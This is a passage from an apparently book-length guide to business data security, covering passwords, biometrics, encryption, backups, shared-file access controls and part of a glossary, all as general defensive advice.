customizing its firewall which is very powerful but not set up well out of the box.
Passwords, Biometrics, and Keychains

Password management has always been a difficult problem for non-technical users and even for many
technical users. A good password is difficult to guess and easy to remember. These do not go well together.
Computer users should not use the same passwords for different purposes, should change them frequently,
18
http://www.autopatcher.com/
41
and should not have a new password be based on an old password (e.g. oldpassword2). Oh, and
passwords should not be written down. If an employee actually tries to follow this advice, they will quickly
have a dozen or more cryptic passwords for different accounts and, unless they have a photographic
memory, will be calling their local IT person to have a password reset on a daily basis.
Memorable Passwords
One simple technique for creating easy to remember yet difficult to guess passwords is one I have
used for years. Take a quote or phrase:
When the wind is southerly I know a hawk from a handsaw.

—William Shakespeare
Take its initials, including proper capitalization and punctuation: WtwisIkahfah. It looks like
gobbledygook, would never be cracked by an automated password guesser (dictionary attack), and
is still memorable. After a few times, typing it becomes automatic.
Playing with numbers and punctuation a little makes the technique even better: “To be or not to
be, that is the question.” could become: 2bon2btit? Use a phrase you will remember, but not
one that someone would obviously associate with you, like a motto or favorite saying. If chosen
well, you can even provide a reminder hint in programs which allow it so you can remember what
quote you chose. For instance, "mad" might be a good reminder for the first quote if you know
Shakespeare (the preceding line is “I am mad but north north-west.”)
What more often happens is that a user has one password they use for everything, and, when forced to
change it, they tack a new number on the end of it. If they need anything more complicated (their software
forces them to have a complex password), they write the password down somewhere near the computer.
This is an unworkable situation. As we discussed in "Guard Your Secrets", a lock is useless if the attacker
can readily obtain or guess the key.
Some people propose biometric security to replace passwords. Biometrics means that the "password" is
based on some unique characteristic of a person, such as a fingerprint, voice print, or a retinal pattern. The
idea is that a biometric is unique, the user cannot forget it, and an attacker cannot easily steal it. It is an
interesting idea, but most current plans are hopelessly optimistic.
The first problem is that a user can in fact lose a biometric or may not have one in the first place. I went
to school with a girl who had no hands and thus, no fingerprints. A significant number of war veterans are
now entering the work force who are missing limbs. ADA rules might expose a business to liability if they
excluded a potential employee from access due to an inability to use the security system.
The second problem is that biometrics are not exact. Taking measurements is a messy business. They
must be taken quickly, the employee is not exactly positioned each time, and the device has to take
into account minor changes such as dirty hands, stress or illness affecting voice, or a dirty lense. The
measurements must have a fair margin of error to ever let anyone in. On the other side, the security
device has to detect and deny reproductions such as voice recordings, photographs of a retina, or a gel
mockup of a finger. Generally what happens is the device denies legitimate employees on an irregular basis
and allows attackers to bypass security. As reproductions get more sophisticated, fooling even devices
designed to detect a heartbeat or capillary action, the problem becomes harder. Fingerprint scanners have
gotten a lot of negative attention from security researchers, being susceptible to balistics gel mockups,
transparencies, and even food-grade gummy-gel fingers [MythBusters-2006, MatsumotoEtAl-2002] all of
which are inexpensive and not obvious even when the security checkpoint is watched.
The third and most serious problem is that people leave copies of their biometrics everywhere they go and
have no way of changing them once the bad guys get a copy. Bad guys can record voices, lift fingerprints,
pick up traces of DNA, or position cameras to catch retinal or iris patterns. If you lose a credit card, you
can cancel it and get a new account number. How do you change a fingerprint? Biometrics will not solve
42
the password problem any time soon. One common security rule of thumb is that authentication uses two
things: something you have (or are) and something you know, such as a username and a password, or a
debit card and a pin number. In that sense, perhaps biometrics are best used in place of the user name
rather than the password.
One good solution to the many passwords problem is a keychain or password vault. In one of my
companies, we had a computer lab. We had a number of locks, on server cabinets and media safes, that
several people needed access to. Rather than give everyone copies and try to keep track of them, we bolted
a locking cabinet to the wall, put the required keys inside, and gave each authorized employee a key to
the cabinet. When they needed a specific key, they went to the key safe, signed out the key, and returned
it when done.
The same general idea can be done with software. Web browsers generally allow you to store usernames
and passwords for websites so you do not have to type them in. You must then only remember the password
to your computer account or web browser and the website passwords can be quite cryptic or even random,
such as "g6%0knpoi2", which an attacker will never guess. In theory, passwords for mail, shared folders,
printers, and what have you can be stored in this way. The downside to this approach is that all of the
passwords are in one place, and, if they can be stolen, the attacker has everything. The password storage
used by Microsoft Internet Explorer and Outlook, for instance, can be raided by spyware. The Firefox web
browser stores its own passwords, and if some options are turned on, is generally safe.
On the Macintosh system, there is a feature called the Keychain which stores usernames, passwords, and
certificates for all applications. The passwords are protected by encryption and are unlocked by a single
password. You can also store secure notes, to safely record account numbers or safe combinations, for
instance. The biggest security features are first, that the keychain can be set to automatically lock itself in
a variety of circumstances, and second, that access to passwords is restricted to the application that created
them. If your Solitaire application starts asking for your email passwords, for instance, the Keychain will
ask you for permission. This stops many types of spyware in its tracks. It looks like Microsoft is slowly
moving in this direction and it may be the shape of things to come.
A last valuable tool is a smartcard or similar device. The employee carries a creditcard or USB drive sized
device which is attached to the computer when they log in. They must also generally type a PIN number.
They cannot login without the device and the device will not work without the PIN. Login is simpler and
thieves must both steal the device and guess the number. Of course, some process has to be in place for
dealing with employees who lose their smartcard, but an old card is easy to cancel and new cards are not
expensive.
Protecting Documents
A PC is an easy target of attack from multiple directions. Spyware infections or remote break-ins can
be used to slurp documents over the network. Employees commonly leave themselves logged in when
they leave their work area, so someone who can physically access the machine can copy files and install
spyware. An attacker might steal the harddrive or the entire computer, especially in the case of an
employee's home office computer or a laptop. I have seen one case where an entire floor of an office
building was cleaned out by thieves with a truck over a weekend. Since renovations had been going on
that week, an extra truck and an extra work crew were simply not noticed. At several companies where I
have contracted, laptops were often stolen during broad daylight by both employees and intruders.
Even without theft, data can be exposed under standard warranty replacement contracts. When a harddrive
fails and is turned in for replacement, it may very well be repaired and resold as a refurbished drive,
complete with your confidential data [Sullivan-2006]. Once the harddrive has failed, it is too late to delete
critical information and hardware erasure methods will void your warranty. The only way to protect these
documents is to encrypt them before the hardware fails. Hardware which is being sold can be erased before
the sale. Broken hardware past its warranty can be dealt with easily by, for instance, drilling holes through
the harddrive and its platters. This can be a great way to get out frustration.
43
Tip
Deleted files do not actually go away. They can be retrieved by a knowledgable computer user.
When deleting confidential files, it is important to realize that nothing is actually erased. All that happens
is that the space taken up by the file is marked as free for reuse. It may be minutes or months before the
space is actually written over by a new document. In the meantime, there are a number of tools which
can be used to recover the deleted data and hackers are familiar with them. Formatting disks works the
same way; the table of contents is cleared but all of the actual data is left as it is. In order to safely destroy
documents, they must be overwritten first and then deleted. A number of tools exist to do this, normally
referred to as secure deletion, and they will overwrite a document multiple times with gibberish to make
them very difficult to recover.
The best way to protect an important document is to encrypt it. Encryption is a complex subject, but, in
short, encrypting a document scrambles it using a code and only someone who knows the code can make
sense of it. Typically, you supply a password when encrypting and use the same password to get your
document back. Different encryption tools have different strengths. Like physical locks, there are tradeoffs
between complexity (how long it takes to encrypt/decrypt your data) and how much effort the attacker has
to go through to break the encryption. Breaking encryption usually involves large amounts of computer
processing, and, because computers get cheaper with time, it makes sense to use encryption which is
stronger than you need today to make sure it cannot be broken tomorrow. Generally, the "proprietary"
encryption built into many applications (e.g. MS Word, PK-Zip) is rather weak; someone can decode the
document quickly even without your password. As with deadbolts, there are published standards for good
encryption, such as IDEA or AES-256, which are well tested.
Data Hygiene: Cleaning Previously Deleted Files
When you are moving to an encrypted file solution, whether it involves encrypting individual files
or whole folders, you need to securely delete any old copies on your hard drive. This includes any
old copies of confidential data you may have already unsecurely deleted and which thieves can
readily access. How do you get rid of those? There are two decent solutions, neither of which is
very complicated.
The first involves wiping the entire drive with a security tool, reinstalling, and copying the files (now
encrypted) back. This is essentially the nuclear bomb solution which is crude and extraordinarily
effective at removing any leftover traces of just about anything, but may be too disruptive, especially
if you have a few machines to change over and people needing to get work done in the meantime.
You might still apply this solution whenever the machines are reinstalled in the normal course of
maintenance.
The second solution is not quite as effective, but is simple and a bit less destructive. Essentially, you
want to force the system to overwrite any free space on the drive, erasing leftover data. Just create
a really big file, filling most of the drive, and securely delete it. On PCs, there are tools to do this
for you. CIPHER.EXE on Windows XP and Windows Server OSes, and the Disk Utility on OS X
("Erase Free Space"). This technique does not necessarily wipe out old file names and so forth (if
you use names and social security numbers or some other sensitive data in your file names) and has
mixed results on Linux/UNIX systems [GarfinkleMalan-2006].
For the truly paranoid (or the truly bound by litigious clients) this second technique can even be
used periodically as part of a data-hygiene policy.
Encrypting individual files is difficult enough that it may lead to unsafe practices if it is your only solution.
First, it is inconvenient to have to encrypt/decrypt individual documents. Second, you need to worry about
cleaning up readable (called cleartext) copies you or your office program may make while working on
them. A safer and more convenient method is to encrypt whole folders or whole drives. Tools will decrypt
44
the files automatically as you use them. You can use a single password, or some tools let you store a key on
a removable device you can lock up at night. You can work on multiple files at once and cleanup is easier.
Different products accomplish this in different ways with somewhat different security, convenience, and
performance tradeoffs.
Ok, if you have all of your important documents encrypted, what happens when one of your employees
is run over by a bus? How do you access all of their encrypted documents? The low-tech solution is one
I have employed many times. When working on a client's systems, I would simply print out the top level
passwords for a system (the root password) and have them put the paper in a safe. If I left their service
or was otherwise unavailable, they had access to their systems. The root password could be used to reset
any of my other passwords even if they did not know them. It is also simple to store the password to a
password file or keychain in this manner.
This works well for managing a few critical passwords that only change on a scheduled basis, but is more
difficult when more users are involved and they are encouraged to change their passwords frequently. Enter
something called key escrow. Key escrow is a process where multiple passwords can be used to access the
same data. Typically, an employee would have one password they used for their encrypted folder and an
administrator would have a master password which could access the folders of all employees. Tools which
implement key escrow, such as Windows XP's Encrypted File System or the Macintosh encrypted home
folders, are becoming common. The downside, of course, is you again have a single password which can
do great damage in the hands of an attacker.
One last consideration is data hygeine. There are a number of places that your confidential data may end
up by accident which need to be cleaned up from time to time, such as your web browser's cache files,
your operating system's virtual memory, and free space on your hard drive. Web browser's have options
to clear private data, which can be used every so often, or the browser's files can be placed in an encrypted
folder. Virtual memory (also called paging or swap) is an operating system feature where the hard drive
is used to keep the system running when you run out of real memory. Applications and data that are not
being used are moved to the slow disk drive to clear space in the fast system memory for applications that
need it. In the process, confidential data such as passwords and sensitive documents you are editting may
get saved on the disk where atackers can find it. Operating systems can be set up to encrypt virtual memory
(configurable on Windows Vista, Apple's OS X, Linux; 3rd party tools on XP). Clearing hard drive free
space is discussed in Data Hygiene: Cleaning Previously Deleted Files.
Backing Up Documents
For the most part, back up and recovery is not a security concern per se and is a complex subject in its
own right. We will touch on some security specific issues here.
Backing up documents is important to protect yourself against attackers who may want to destroy data
instead of or in addition to copying it. Many attackers will not draw attention to themselves by destroying
data on any large scale, but tampering with data, particularly financial records or log files, is a serious
issue. Regular backups will allow you to compare copies of records and detect discrepencies. In the case
of log files, they contain valuable forensic evidence that will help you and the authorities in investigating
a crime. Any attacker gaining access to a system will attempt to alter or destroy them. It is critical that logs
be written to a remote location, which is a feature in many software or hardware tools.
Mirroring or high availability systems (RAID) which make copies of data across several disk drives are
not backup systems for purposes of security. Mirrored hard drives are clones of each other; if an important
document is deleted or modified on one drive, it will immediately be deleted or modified on the other,
leaving no one the wiser. A backup system must take snapshots of files at a particular point in time so that
documents can be restored to some previous state when they are needed.
Backing up encrypted files can be tricky. You either need to store passwords with the backups (since they
change over time) or store the data unencrypted. In either case, the backups must be physically secure or a
45
thief will simply steal them instead of the computer. I have seen many cases where companies store backup
tapes unlocked right on top of the system being backed up. Not only does this make a thief's job easy,
it guarantees that a fire which destroys the computer destroys the backup as well19. Small, fire-resistant
media safes are convenient and inexpensive protection for small businesses.
Storing data unencrypted prevents problems when the passwords get separated from the data or if the tool
you used to encrypt them is no longer used. PCI/DSS requires that backups containing customer account
information (the PAN, or Primary Account Number, specifically) be encrypted [PciSsc-2006 § 3.4]. In
this case, you will want to deliberately store the data and passwords in separate, secure, locations. Media
safes and secure offsite storage may be good options for protecting your media and both can protect from
fire, accident, and other losses.
Tip
Test your backups or they might not be there when you need them.
Oh, and test your backups occasionally. An administrator at a Canadian agency recently wiped out an
accounting system with $38 billion in accounts by accident and then found out that the backup tapes were
unreadable [Maxcer-2007]. I'll bet he's looking for work.
Network Services - Sharing and Editing Files

Between the PC and the firewall, there may be a wide range of network services, but mostly they come
down to ways to collaborate- sharing and editing files, which is where we will focus our attention.
Network Authentication
When you get past the smallest of networks and the individual PC, there has to be some way to know
whether someone belongs on the network at all. At home, I have two computers which are used by the
same people. I just create the same accounts on both computers with the same passwords. Sharing files
is not hard. The computer in the living room allows anyone to connect that is on the inside network and
can provide the proper username and password. Someone would be hard pressed to plug a new computer
in without my knowing.
This setup quickly becomes unworkable as the number of PCs grows. Keeping passwords and accounts
up to date across more than a handful of computers is a pain. Forgetting to remove people who should no
longer have access is dangerous. This is generally solved by some sort of network authentication system
which keeps track of the accounts and passwords, allowing one change to affect everything which needs
changing. When someone sits down at a PC, the PC checks with the network system to see if the person
is allowed access. The same thing happens when someone tries to access a shared file. It is also possible
to find out when someone plugs an unauthorized computer (e.g. a laptop) into the network. There are a
number of different ways to do this and secure it.
Regardless of your setup, an important thing to note is you need to have a defined policy for departing
employees. Just as many companies have an exit checklist to make sure employees have turned over
required paperwork, files, and keys when they leave, you should have a checklist making sure that all of
their accounts, passwords, and access rights have been terminated, and that their electronic documents
have been transferred for someone else to sort through and file. It is a simple thing which can save much
potential grief.
Systems appearing on the network can be handled a number of ways. Network services can be set up to
only communicate with known PCs. This can be done by several methods and trades some complexity
19
I was once bitten myself when we brought backup tapes back onsite to restore a server after a lightning strike and data loss. At that very moment,
a pipe broke above us and flooded the computer room. The resultant electrical chaos destroyed the backup. If you use offsite storage, make a copy
to bring back onsite.
46
for added security. Unknown computers can be quarantined, restricted, or simply treated as guests, able to
access web sites and email for the benefit of contractors or other visitors with laptops.
Shared Folders and Files

It is not enough for employees to be able work on documents stored on their own PCs. They must also be
able to share documents with other employees, look up old documents, and collaborate on the production
of new documents. Once again, there are many different technologies to do this, and, to the extent possible,
we will ignore them except where it matters to security.
Whether people share files from their PCs, the files are placed in a central server, or they are stored on a
vendor's site, from a security point of view, the basic problem with sharing documents is how to let the
people that need access get it while denying access to everyone else. This is usually accomplished with
one of two basic processes.
The first is through Access Control Lists (ACLss). ACLs are sets of rules about what individuals or
groups can do specific things to a particular resource, such as add documents to a folder, or read a
sales report. The combination of individuals, groups, and different types of permissions in many systems
can be quite powerful, such as saying that everyone in Accounting has full access to a folder, except
Contractors. George (a contractor), can read documents and nothing else. Different systems provide
different protections and amounts of detail. By setting up appropriate groups and folder permissions, the
access controls on individual files may seldom need to be mucked with.
The second process is through workflows. A workflow is a sequence of steps, from start to completion,
that some document goes through as part of a business process, such as producing a proposal. Individuals
have roles in this process, such as editting, reviewing, approving, and sending the document. After the
customer receives it, it may go through another round of changes before being filed for reference in
contract negotiations. Workflow automation, typically built into Content Management Systems, shows
team members what stage the document is in, what their assigned role is, and what their assigned action
items are. At each stage, the individuals have different access rights to the document according to their
role in the project. In all likelihood, only team members (and their superiors) will have any access at all,
and some team members only late in the process.
There are often arguments about which system is better. Like most such arguments, they miss the point.
Both are good systems and have their uses. Access Control Lists are better at managing files or records
that do not change very often and do not have distinct owners, such as client histories or past proposals.
ACLs are generally centrally managed and keeping track of permissions for changing team structures
involves a lot of interaction with system administration. Workflow systems tend to be more efficient for
documents that are being created or actively worked with. Applications usually let teams or managers
assign permissions for the projects they own, so less technical support is needed.
What generally happens is that businesses end up with a file server of some type which uses folders and
ACLs and then provide another system for discussion and collaboration. Lotus Notes™ is a popular system
in many organizations, especially technical ones, for project interaction, but these days there are many
options at many price ranges.
A problem in both of these systems is that access rules are hierarchical. Administration staff can access
any document on the system, and, in workflow systems, managers generally can as well. This access is
necessary if someone is to be able to fix problems or access documents when their owner is suddenly
unavailable. Aside from issues of trust, however, a compromised master password or broken security
system lets an attacker take anything they want. In essence, this is no different from physical files in that
there is usually a master key to all offices and physical security can generally open locked cabinets and
secure areas. The difference is that, with electronic systems, an attacker can access the system locally or
remotely, and carry out (or modify) large amounts of data without arousing suspicion. We will talk about
some solutions to this problem as we go.
47
Encrypting Shared Documents

Encrypting shared documents is one way to get around the untrusted computer problem. A document can
be encrypted with a password and the password given out to the people that need to access the document.
Then, even if someone gains control of the computer where the document is stored, they will not be able
to read it. Doing this systematically means that you can store sensitive documents on untrusted sites where
the administration is outsourced, such as a shared web hosting provider.
As a rule, sharing a single password, such as by encrypting a Word document and emailing it to everyone,
is a bad idea. If a password is potentially compromised, everyone's password has to be changed, and
distributing the new password (safely) is difficult. Two technologies make this easier.
The first is called Public Key Cryptography, which we will talk about in detail in (emv20070510)FIXME:.
In this system everyone has a key or certificate that belongs to just them. They use this key in encrypting/
decrypting files.
The second is key escrow. We talked about key escrow in the section called “Protecting Documents”. In
theory, one file can be encrypted so that any number of peoples' keys will unlock them. A document author
can simply select names from an addressbook or company directory, encrypt the document, and store it
in a shared folder. If necessary, the list of people able to read the file can be changed. Again, as long as
all of the encryption/decryption is done locally, the remote server does not have to be trustworthy because
even someone with administrative control cannot read the file.
In practice, group-level encryption becomes messy and unsafe when the number of people needing access
is large, when ownership of documents changes over time, or group membership changes. In these cases,
either the owner ends up being a gatekeeper (“Can you give me access to ...?”), or there is a push for a more
central management of access rights. In the first case, we have the owner disbursing new encryption keys
or special copies of the document on a regular basis, at which point, why outsource document handling?
In the second case, we end up in another “One Ring to rule them all” situation, which is precisely what
we were trying to avoid [LioyEtAl-1997].
As usual, we end up making trade-offs. For archival information where the number of people needing
access is relatively large, specified by groups whose members change, and centrally administered, it
makes more sense to use centrally-managed encryption, despite the security implications. Where more
protection is needed, other solutions, such as restricting physical access, may be necessary. For workflow-
like situations, where a document is actively worked by a small team, individually managed encryption is
more feasible, and often, since the data is current, the documents may be more sensitive.
In situations where data is accessed by automated systems (an online storefront accessing stored credit
card information, for instance), applying encryption effectively is very difficult. It is not practical to have
an employee sitting there entering a password everytime a customer checks out and needs to use the same
credit card they did last time. The storefront needs to be able to access the customer data without any
intervention. If the credit card information is encrypted, the application must be able to decrypt it, and,
therefore, anyone gaining control of the application can read the records no matter what security is in place.
Security is only as strong as the weakest point in the perimiter.
A handy solution to this dilemma is to use the customer's password to encrypt the data. The customer has
to give you their password to check out, anyway, so their experience is not changed. An attacker gaining
control of the system has no way of knowing what the customer's password is (there are ways to check a
password without actually storing it anywhere; trust me on this20), so they cannot read the information.
They might be able to copy small amounts of data over time (as customers log in and check out), but you
have made their job much harder.
20
For the overly curious, one way is to apply a math operation to it (a hash) and store the result. When they give you their password next time, see
if you get the same result. Another way is to use their password to encrypt something. If they can read it, they have the right password.
48
The interesting side-effect is that no one can read the customer's card information without the customer's
password. That includes your own employees if they get any bright ideas on selling stolen credit card
numbers. Once the purchase is completed, the card information is locked away. It also means that the
customer him or her self can not access the card information if the password is forgotten. In this case,
delete the information, and have them enter their credit card number again the next time they purchase.
Make sure you encrypt only what you need to, minimizing inconvenience, and take the opportunity to
explain how you are protecting them from identity theft.
Restricting Network or Physical Access

Another way to protect sensitive shared documents is to restrict where they can be accessed. We already
mentioned the possibility of splitting documents based on sensitivity, with some residing inside and some
outside the firewall, in the section called “The Back Door - Employees On the Go”. Here, we examine
some other ways to restrict access.
If you have an online storefront and a database of customer information, you can put the customer
database on its own computer and severely restrict access to that computer (in fact, PCI/DSS requires
this [PciSsc-2006 § 1.3.4, § 9.1, etc.]). In particular, it is possible to put the database on its own network
section, have it only respond to specific connections from your online storefront and internal order tracking
system (to which it is directly wired) and only allow administration from its own keyboard (presumably in
a locked room). If it must be remotely administered (remote emergency management), force connections
to come through a specific administrator workstation so that someone must go through multiple, logged,
levels of security to gain access, and even then, they do not need to be able to see customer data to fix
a software outage.
In this way, an attacker is hemmed in. A remote breach of the storefront can only do things the store
is normally allowed to do, such as accessing customer records one at a time with a password, rather
than copying them all at once, and there is seldom a reason to display a whole account number back
to a customer. Inside attacks are similarly blunted: Internal order processing doesn't need to see whole
customer card information, (once it has been sent through the card processing system and confirmed) and
an employee would need physical access to get anything more (Smile for the camera!). A determined and
resourceful attacker can still do damage, but it will take serious work, your pool of suspects will be smaller,
and your evidence will be of higher quality.
Other sensitive documents can also be physically restricted. At the Pentagon, the classified information
was on a completely separate network; there were no physical connections to the Unclassified network
and someone had to physically sit at a Classified computer to access restricted data. Moving information
from one system to the other (by disk) required going through the responsible officer who had to examine
the data and the disk. Moving data without permission was severely disciplined.
Perhaps you do not handle information which can determine the fate of countries, but you may very well
have documents that can sink your business if improperly used. It may be worth asking yourself: do I really
need this available outside the office? Can the people on the team come here to work on this document?
Do I really want to face liability if this walks out the door? The best network defense is sometimes a pair
of scissors: clip the network cable.
If you do have restricted machines, you will need to get some information in and out (like reference sources
in and completed documents out), but will need control over it. UNIX/Linux based systems are particularly
good at controlling access to external disks and devices. You can specify exactly who may do what with
CDs or the ubiquitous USB drives. This is a much less messy solution than gluing USB ports shut (which
companies have done). You can assign one or more gatekeepers to make copies of documents when people
need them.
Of course, all of this is a lot of work, may be expensive, and is in direct opposition to recent trends in
telecommuting. Particularly as gas prices reach record highs, employees have a tremendous incentive to
work at home. We also work in markets that are increasingly globalized; it is not always practical to bring
49
people to the same location to work on a document. As usual, what you choose depends on the value of
your data, the risks of its exposure, and the business opportunities you want to take advantage of. No one
can make that choice for you, and, in the end, there may be no perfect answer.
Internet Services and Communication

In order to function, employees need to be able to communicate with the outside world and use services
from other businesses. Increasingly, these services and communications are provided by the Internet.
Restricting Use
Even when employees are allowed to access documents, you may want to restrict what they can do with it.
Access controls and encryption does not seem to be worth much when an employee can put an unprotected
copy on a disk and take it home, or forward a sensitive email. Once you send a document to a client or
vendor, none of your network protections come into play.
The solution to this dilemma, or so many vendors claim, is a technology called Digital Rights Management
or DRM.
Conclusions
Frustrations
Inevitably, as your data security plan progresses, you will encounter frustrations once you leave the safety
of your own network. Implementing a policy of secure email and document encryption will only get you
so far when the companies you communicate with do not use them. Protecting your confidential data
may seem hopeless when the vendors and agencies you must entrust it to in the course of business are
compromised on a regular basis.
This difficulty is one of the reasons there is so much quality free security software available. Many
individuals, companies, and agencies have realized that increased use of these technologies benefits them
and have donated time and money to making them widely available. For the most part, however, use
of protective technologies for Internet communication to prevent forgeries, tampering, and disclosure is
rare, even though the technology has been widely available for more than a decade. This is mostly due to
consumer ignorance of how Internet criminals operate and how technology can work against them. The
fact that law enforcement has tried to associate the use of encryption with criminals and terrorists does
not help the situation.
In reality, the use of technologies to prevent forgery alone can make a large difference in Internet
communication. SPAM can be sent without forging emails, but the ability to forge sender addresses makes
it much harder to stop. If SPAMers had to use legitimate domains and servers to send their mail, zombie
botnets would be less useful and domains which sent SPAM could be blacklisted from mail servers.
Without the ability to easily forge emails, email phishing schemes would virtually disappear. Initiatives
like the Sender Policy Framework21 for identifying which computers are allowed to send email for an
Internet domain and personal solutions like digitally signing email, allow the receiver of an email to have
greater confidence that what they receive is legitimate. We have SSL and digital certificates to tell us that
the website we are entering our credit card information into is who we think it is, but people commonly
open attachements in emails that claim to be from friends or colleagues with no real way to know where
it came from.
As for encryption in emails, regulations, confidentiality agreements, or self-preservation may lead you to
protect data in transit. We do not write financial data on the outside of a postcard and stick it in a mailbox.
21
http://www.openspf.org/
50
Yet, encryption does not help if the receiver cannot read it. It can be difficult to convince a business partner
to adopt a security practice in order to work with you. Do not count out the low-tech solutions. In some
cases, old-fashioned mail or personal service may be the safer option.
Compromises in vendor and agency security present a difficult problem. Selecting trustworthy vendors,
considering the widespread nature of the problems, requires something akin to psychic powers. Even if
that could be done consistently, you cannot refuse to provide data to government agencies. Two techniques
can be of help. One is using unique data with each vendor. Some banks allow the creation of one-time
credit card numbers which can be used for a single transaction. It is also possible to use a unique email
address for each vendor you work with. Watching where this unique data turns up tells you who is selling
or exposing your private data and the facts may surprise you. Another good technique is making sure you
have confidentiality agreements protecting important data and relationships. Boilerplate text may do in
many cases. It may make another organization think more seriously about your documents, and, at the
very least, it gives you a basis for a legal action if your data is stolen.
As a whole, the solution will require outreach, activism, lawsuits, and time. Consumers need to know
the nature of the problems they face and that they have choices for protecting themselves. Until public
policy and caselaw makes entities responsible for data leaks and for illegal use of their equipment, many
businesses will not take action. At present, for instance, merchants who are the victims of credit card fraud
pay the brunt of costs and fees, leaving those who actually lose the data little incentive to improve. Over
time, standard practices will develop and caselaw will begin to take those practices as a matter of course.
In the meantime, tenaciousness and creativity will have to do.
Glossary
Access Control Lists A list of individuals or groups allowed to access a particular resource
in a specific way, for instance, write to a document, or delete
documents in a folder. Common controlled actions are Create, Read,
Update, and Delete, or CRUD. ACLs can usually include basic rules,
such that, for instance, all members of Accounting can access a
document, except Contractors. ACLs are usually centrally managed;
teams are limited in their ability to manage document access rights.
Airport™ An Apple trademark that is commonly used to refer to wireless

networking or WiFi (techically the 802.11x networking standards).
bluetooth® A short-range radio technology for connecting to computer

peripherals, such as mice, keyboards, PDAs, cellphones, and headsets.
Like wireless networking, bluetooth can be hijacked if left on or used
in public places, although its short range makes attacks more dificult.
botnet A collective of remotely controlled, infected PCs (zombies) that are

controlled as a unit. A botnet can consist of thousands or tens of
thousands of PCs and can carry out coordinated Distributed Denial-
of-Service DDoS attacks against a single target. Botnets can also be
hired out to collect information, send SPAM or conduct other illegal
activities.
COBIT® Control Objectives for Information and related Technology or

COBIT® is a set of best practices for information management
created by the Information Systems Audit and Control Association
(ISACA)22, and the IT Governance Institute (ITGI)23, initially
published in 1992. Version 4.1 will be published in May of 2007. The
51
current version is 4.0 [Itgi-2005] COBIT® is a standard for overall

management and control of information technology in a business,
including risk management, cost and quality control, and our present
interest, security.
COBIT provides a specific section in its standard to deal with

information security policy which is tied into the overall IT process
[Itgi-2005 pp 119-122], although other sections, such as providing
continuous service, are certainly relevent. An additional document,
the COBIT® Security Baseline is divided into 39 essential steps for
securing the business [AliPabrai-2005, Itgi-2004] which add detailed
guidance to the COBIT base standard. These steps concentrate on
process and procedure more than specific technology, allowing a
business to choose (and document!) techniques which best fit their
needs.
CSIRT An acronym for Computer Security Incident Response Team,

sometimes referred to as an Incident Response Team or Computer
Emergency Response Team (CERT). A CSIRT is the group of
Security, IT, Legal, Public Relations, and Management personnel that
are involved or can be involved in responding to a security incident.
An Incident Response Plan should lay out the responsibilities of the
members of a CSIRT and the situations in which they are called in or
must be informed of an incident.
de-facto standard A practice or technology which is in common use and has become
a psuedo-standard, although it has no official design, definition,
or consensus. One of the most frequently cited examples of a de-
facto standard is the Microsoft Word™ file format. Word .doc files
are used everywhere for exchange of documents, but there is no
written specification for what the inside of the document looks like
and, in fact, the format has changed several times over the years,
leading to data exchange problems. De-facto standards lock customers
into a single vendor and product line since competitors cannot (are
not allowed to) provide compatible products24 The Open Document
Format, by contrast, a recent ISO standard, is a simple, concise
standard approved by a consortium of companies and supported by
multiple products.
Underspecified document formats can have real security impacts.

While I was working at the Pentagon, an officer moved a Word
document containing unclassified data from the classified network to
the unclassified network (which are physically separated) by a floppy
disk. Unknown to him, Word documents (at the time) scooped up
random information from the hard drive when they are created and
his file contained classified information hidden in the document but
visible to someone who knew how to look at the raw data. When
this was discovered, security personnel had to scrub a number of
computers which had come into contact with the classified data. The
peer review process which leads to a public standard is designed to
eliminate design flaws of that nature or at least make them known to
potential users with special needs.
De-facto standards have the advantage of being driven by a single

developer and coherent point of view rather than being designed by a
52
committee. This is a particular advantage with developing completely

new technologies. Sometimes, these products become real published
standards at a later date, such as UNIX™, and Adobe PDF™. This
can lead to a best-of-both-worlds situation where a well designed
and market-tested product is maintained and slowly extended by a
standards body.
defense in depth A defense which consists of multiple integrated layers where the
strength of the whole is greater than the sum of its parts. Attempts
to exploit some weaknesses may be prevented or limited by other
defenses. A single layer defense by contrast, even when strong, can
often be bypassed completely when the defenders make a single
mistake. Elements of a data security defense in depth include keeping
attackers out of your network, denying them access to your PCs even
if they are on the network, and encrypting sensitive documents so that
they are useless even if they are stolen.
Denial-of-Service An attack which causes some service to stop functioning rather than
attempting to take control of it. A Denial-of-Service attack on a
website, for instance, would make it unusable or slow for legitimate
customers. Vulnerabilities leading to DoS tend to be more frequent
and easier to exploit than actually taking control of a computer, though
of less use to the attacker.
A Distributed Denial-of-Service (DDoS) is a coordinated attack

by many computers at once against a single target. DDoS usually
involves a colection of zombies (or botnet) and is done for purpose of
ideology, revenge, or extortion. The fact that the attacks come from
many distinct, innocent sources makes them difficult to counter. The
individual contribution of one infected PC is small and may not be
detected by the owner's Internet Service Provider, but the combined
effect is devestating and sustained attacks can bankrupt businesses
with bandwidth charges and lost revenue.
DMZ A small network provided by a firewall for Internet services, such as

web and mail servers, to reside. These servers must be exposed to the
Internet so that customers may access them, but should have at least
limited protection. The DMZ is more dangerous than the inside of the
firewall, so more effort needs to be taken to make sure the servers are
secure. Consumer grade firewalls often limit the DMZ to a single PC,
called the DMZ host which has minimal or no protection.
DMZ stands for Demilitarized Zone, although the full name is never
used. It refers to the land-mined no-man's land between North and
South Korea and underlines the fact that it is a dangerous space
between the internal network and the hostile Internet.
DRM a technology which aims to restrict the particular uses a file,

document, or media item may be used for. For example, it may be
used to restrict viewing to certain computers, certain people, prevent
copying, forbid editting, cause documents to expire, or track usage.
Its flaw is that, in order for legitimate users to access a document,

the document must contain the information necessary to read it
(by definition). DRM relies on security by obscurity and restricting
53
content viewing and editing to specific applications which know

the secret handshake for unlocking the document. The application
then reads and enforces restrictions encoded in the document. DRM
functions well if-and-only-if the secret is not known. Once that secret
is revealed, all protected documents are compromised.
exploit A means of effectively using a vulnerability to bypass security or

cause damage. For example, a vulnerability might be a bug in a web
browser. An exploit would be a web page which uses the bug to send
a malicous program to the user. See zero-day exploit.
fingerprint A unique identifying number for an encryption key or certificate.

Basically, the fingerprint is a quick way of verifying that you are using
the correct key and that it really belongs to who you think it does.
For example, if you want to send someone confidential information,
you can look up their public key (see Public Key Cryptography) in a
directory. To make sure that the key in the directory is correct (and
not fraudulent), you can look at the key's fingerprint and verify it by
some other method, such as calling the person on the phone, checking
the back of their business card, seeing if it is listed on their web page,
and so forth. Once you have verified the key the first time, you can
add it to your own key ring and tell your application that you trust it.
Similarly, you should list your key's fingerprint prominently to make
it easier for people to verify your public key.
firewall Controls traffic between an inside network (Intranet), such as a home

or business, and an outside network, such as the Internet. A firewall
keeps unwanted traffic out and protects computers on the inside. A
